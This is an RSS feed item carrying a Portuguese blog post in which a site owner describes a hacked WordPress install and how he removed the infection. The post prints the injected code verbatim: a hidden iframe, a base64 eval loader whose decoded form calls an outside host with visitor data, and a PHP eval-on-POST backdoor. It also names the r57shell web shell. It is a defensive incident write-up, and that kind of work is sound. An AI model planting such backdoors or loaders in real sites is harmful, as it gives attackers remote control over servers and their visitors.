<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Silvano Girardi Jr. &#187; wordpress</title>
	<atom:link href="http://www.silvano.pro.br/tag/wordpress/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.silvano.pro.br</link>
	<description>Work and Life</description>
	<lastBuildDate>Fri, 17 Apr 2009 11:06:25 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.9.2</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>Recomeço&#8230;</title>
		<link>http://www.silvano.pro.br/2009/04/10/recomeco/</link>
		<comments>http://www.silvano.pro.br/2009/04/10/recomeco/#comments</comments>
		<pubDate>Sat, 11 Apr 2009 01:51:33 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Português]]></category>
		<category><![CDATA[hacked]]></category>
		<category><![CDATA[segurança]]></category>
		<category><![CDATA[wordpress]]></category>

		<guid isPermaLink="false">http://www.silvano.pro.br/?p=38</guid>
		<description><![CDATA[Há alguns dias, notei algumas diferenças com relação ao meu blog e principalmente no meu pagerank, que antes era de modestos 4/10.
Antes, quando você entrava no google.com.br e digitava &#8220;programador php&#8221;, meu site era o primeiro da lista. De tempos em tempos costumo verificar se esta situação se mantem e na minha última tentativa, espanto! [...]]]></description>
			<content:encoded><![CDATA[<p>Há alguns dias, notei algumas diferenças com relação ao meu blog e principalmente no meu pagerank, que antes era de modestos 4/10.</p>
<p>Antes, quando você entrava no google.com.br e digitava &#8220;programador php&#8221;, meu site era o primeiro da lista. De tempos em tempos costumo verificar se esta situação se mantem e na minha última tentativa, espanto! Meu blog simplesmente sumiu do google!<br />
Chequei meu pagerank e outro susto: estava zerado!</p>
<p>O que diabos estava acontecendo?</p>
<p>Então comecei a checar os códigos do wordpress e encontrei <strong>alguns, </strong>problemas:</p>
<p>1 &#8211; havia um iframe no final das minhas páginas:</p>
<blockquote><p>&lt;iframe src=&#8221;http:// google &#8211; stat .com /tomi/?t=2&#8243; width=0 height=0 style=&#8221;hidden&#8221; frameborder=0 marginheight=0 marginwidth=0 scrolling=no&gt;&lt;/iframe&gt;<br />
(<em>coloquei os espaços no domímio porque não quero gerar mais tráfego para este indivíduo</em>)</p></blockquote>
<p><strong>Para remover:</strong> se você tem acesso SSH ao seu servidor, você pode remover este iframe de todas as páginas com o comando:</p>
<blockquote><p><code>find ./* -type f -exec sed -i 's/&lt;iframe src="http:\/\/google - stat.com\/tomi\/?t=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no&gt;&lt;\/iframe&gt;//g' {} \;<br />
(<em>remova os espaços no domínio</em>)</code></p></blockquote>
<p>Ao entrar no meu blog, aparecia um PDF para fazer download. WTF?! Era culpa deste iframe, que injetava um vírus no documento.</p>
<p><strong></strong></p>
<p>2 &#8211; o .htaccess foi modificado</p>
<p>Meu .htaccess foi modificado. Quando qualquer bot de engine de busca acessava meu site, ele era automaticamente redirecionado para outro site. Fiquei tão P* que deletei e não tenho aqui o conteúdo do .htaccess</p>
<p>3 &#8211; havia um código php malicioso no index.php que gerava links aleatórios para outros sites.</p>
<blockquote><p><em>eval(base64_decode(&#8216;JGNoPWN1cmxfaW5pdCgiaHR0cDovL3Vzci01Mi5hZHNsLm1kL2lu<br />
YzIucGhwP2hvc3Q9Ii51cmxlbmNvZGUoJF9TRVJWRVJbIkhUVFBfSE9TVCJdKS4iJmlwP<br />
SIudXJsZW5jb2RlKCRfU0VSVkVSWyJSRU1PVEVfQUREUiJdKS4iJmFnZW50PSIudXJsZW<br />
5jb2RlKCRfU0VSVkVSWyJIVFRQX1VTRVJfQUdFTlQiXSkpOyBjdXJsX3NldG9wdCgkY2gs<br />
IENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsMSk7ICRyZXN1bHQ9Y3VybF9leGVjKCRjaCk7<br />
IGN1cmxfY2xvc2UoJGNoKTsgcHJpbnQgJHJlc3VsdDs=&#8217;));</em></p></blockquote>
<p>O resultado do decode é este:</p>
<blockquote><p><em>$ch=curl_init(&#8220;http://usr-52. adsl .md/inc2.php?host=&#8221;.urlencode($_SERVER["HTTP_HOST"]).&#8221;&amp;ip=&#8221;.urlencode($_SERVER["REMOTE_ADDR"]).&#8221;&amp;agent=&#8221;.urlencode($_SERVER["HTTP_USER_AGENT"])); curl_setopt($ch, CURLOPT_RETURNTRANSFER,1); $result=curl_exec($ch); curl_close($ch); print $result;</em></p></blockquote>
<p>4 &#8211; em <strong>diversas </strong>páginas encontrei mais códigos maliciosos que poderiam executar qualquer coisa enviada pelo indivíduo que fez isso em meu blog.</p>
<p>Eis aqui como ele se parece:</p>
<blockquote><p><em>&lt;?php if($_GET['9e26465b24966559']==&#8221;a2bc87015a3f0dc6&#8243;){ eval(base64_decode($_POST['file'])); exit; } ?&gt;</em></p></blockquote>
<p>Este trecho do código aparece em muitas páginas e o nome e valor da variável $_GET sempre muda.</p>
<p>Faça uma busca nos seus códigos por <em>eval(base64_decode</em> e se encontrar algo, remova imediatamente.</p>
<p>5 &#8211; havia um arquivo wp-content/cache.php</p>
<p>Este arquivo era simplesmente uma shell escrita em php, chamada <em>r57shell</em><br />
Busque este arquivo ou o nome desta shell e se encontrar&#8230; é meu querido&#8230; bem vindo ao clube.</p>
<p>É bem provável que outras coisas tenham sido adicionadas, então eu decidi limpar tudo e reinstalar o WP, porém agora com a última versão.</p>
<p>Ainda não sei como este cara teve acesso, mas provavelmente foi alguma vulnerabilidade no WP ou algum plugin que eu estava utilizando.<br />
(<em>mas ainda tenho dúvidas se não foi algo com a dreamhost, pois eles mudaram meus sites de servidor recentemente</em>)</p>
<p>Se você utiliza wordpress, recomendo que utilize este plugin: <a href="http://wordpress.org/extend/plugins/exploit-scanner/" target="_blank">http://wordpress.org/extend/plugins/exploit-scanner/</a></p>
<p>Enfim&#8230; o que me resta agora é tentar recuperar meu pagerank.</p>
<p>Abraço!</p>
]]></content:encoded>
			<wfw:commentRss>http://www.silvano.pro.br/2009/04/10/recomeco/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
	</channel>
</rss>
